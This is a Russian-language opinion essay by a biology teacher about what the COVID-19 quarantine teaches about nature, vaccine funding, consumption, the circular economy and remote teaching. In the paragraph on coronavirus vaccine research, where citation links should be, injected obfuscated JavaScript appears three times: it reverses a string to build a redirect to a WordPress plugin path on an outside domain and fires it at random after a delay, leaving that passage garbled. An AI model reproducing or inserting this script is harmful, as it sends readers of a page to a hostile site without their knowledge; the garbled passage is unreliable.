Говорят, на улицах Барселоны бродят кабаны, на улицы города Нары в Японии вышли олени из местных парков, на площадях Рима кое-где прорастает зеленая травка, на автостраде Иерусалим — Тель-Авив появились дикие козы. Можем ли мы сказать, что мир природы быстро забыл о человеке? Что без человека природе лучше?
В общем-то, очевидно, что, если человечество исчезнет, на некоторое время в мире воцарится хаос. Оставшись без управления, многочисленные технические приспособления начнут взрываться, гореть… Но через несколько десятилетий это прекратится, планета залечит раны и будет развиваться дальше. Гораздо дольше будут тлеть свалки, которые мы разбросали по планете; еще дольше сохранится пластик в океанах. Но и это закончится лет через 300-500.
События, участниками и свидетелями которых мы оказались, очень интересны! И с точки зрения политики, экономики, экологии, педагогики, биологии и медицины, и с точки зрения этики тоже. Не очень приятно оказаться при этом подопытным кроликом — но в том, что очень многое даст пищу для исследований, я уверена.
И, несмотря на тревогу и беспокойство за близких, я воспринимаю нынешнюю ситуацию как возможность для серьезных размышлений. И я собираюсь потихонечку порешать для себя сущностные вопросы.
В общем: что мы можем для своего миропонимания вынести из этой ситуации? Это, конечно, мое личное суждение, глубоко дилетантское…
В медицину лезть не буду. Скажу только, что работа над вакциной от коронавирусов была начата в начале 2000х, но финансирование было прекращено, так как SARS —тогдашнюю коронавирусную пневмонию — удалось относительно быстро остановить и без вакцины ($mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to=kulichenkos%40gmail.com»>https://m.nsk.kp.ru/daily/27082.4/4153975/). Более того, еще в 2014 году вирусологи говорили, что коронавирус, живущий в летучих мышах, может мутировать и «переселиться» в человека ($mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to=kulichenkos%40gmail.com»>https://virologyj.biomedcentral.com/articles/10.1186/s12985-015-0422-1; $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to=kulichenkos%40gmail.com»>https://jamanetwork.com/journals/jama/article-abstract/1785455). Так что бюрократические и финансовые препоны на тот момент победили науку. Есть надежда, что теперь это изменится.
Уже давно меня огорчает то, что человечество измеряет процветание и развитие в процентах роста ВВП. Это означает постоянное увеличение количества потребляемых ресурсов и производимых товаров. При этом страдает качество окружающей среды и качество жизни людей. Загрязнение среды приводит к заболеваниям. Достаточно вспомнить недавние — и продолжающиеся до сих пор — конфликты из-за мусорных полигонов в нашей стране. А ведь можно этого избежать — меньше производить разного ненужного — и перерабатывать мусор.
Кроме того, человечество уже придумало способ сдержать рост потребления ресурсов: circular economy (https://www.ellenmacarthurfoundation.org/circular-economy/concept). Речь о том, чтобы уменьшить количество вещей, находящихся в личном владении. Как? За счет системы аренды. Берут же люди напрокат вечерние платья или машины, если они нужны на один день/вечер. Почему бы не распространить это на многое другое? Собственно, производители могли бы отдавать в лизинг/прокат множество товаров, которые мы сейчас покупаем – а потом они вынимаются из шкафа два раза в году. Да, у многих людей есть желание иметь свое – особенно, если, как в нашей стране, людей в этом ограничивали десятилетиями. Но во многих странах молодые люди не стремятся к владению вещами. Наоборот, развиваются разнообразные ко-воркинги, ко-ливинги. Посмотрим, что из этого получится. Если люди смогут пересмотреть свое отношение к потреблению и к разграблению природных ресурсов, будет очень хорошо.
Я уверена, что сейчас люди задумаются об этом серьезнее. Ведь, сидя на карантине, мы имеем чуть больше времени для размышлений — и меньше — для загрязнения природы. Удастся ли людям понять, что измерение процветания в параметрах роста производства товаров абсолютно губительно как для развития экономик, так и для личности человека и для природы? Современный мир может перейти от экстрактивной экономики и производства вещей (товаров) к целенаправленному развитию человеческого капитала. Важно понять, что в постиндустриальной экономике и культуре ВВП создается производством услуг, информации, науки и культуры. Тогда проекты по созданию вакцины будут финансироваться.
И the last but not the least! Что мы вынесем из нынешнего дистанционного обучения, чему научимся мы, преподаватели? Конечно, и в очном формате можно было прогуляться с учениками по Музею естественной истории в Вашингтоне. Но только сейчас это превращается не просто в экскурсию, а в полноценный мини-проект. В очном формате всегда есть соблазн пройти путь учения вместе с детьми, подсказывая и направляя их. В формате online этот соблазн исчезает, как ни странно. Наоборот, хочется отпустить детей в самостоятельное плавание – и потом обсудить, что они вынесли из него, и как им удалось не утонуть. В общем-то, ученик имеет право выполнить задание настолько, насколько оно его интересует. Поэтому особенно важна система многоуровневых и многообразных заданий, которые могли бы «зацепить» самых разных детей.
Мне кажется, что стиль и содержание преподавания после полноценных дистанционных занятий должны измениться. Удаленное преподавание в любом случае строится на доверии к ученику. Это – большая ценность, которую ни в коем случае нельзя потерять по возвращении в класс.
Статья Елены Исааковны Лернер — кандидата педагогических наук, преподавателя биологии и экологии на английском языке в DP программе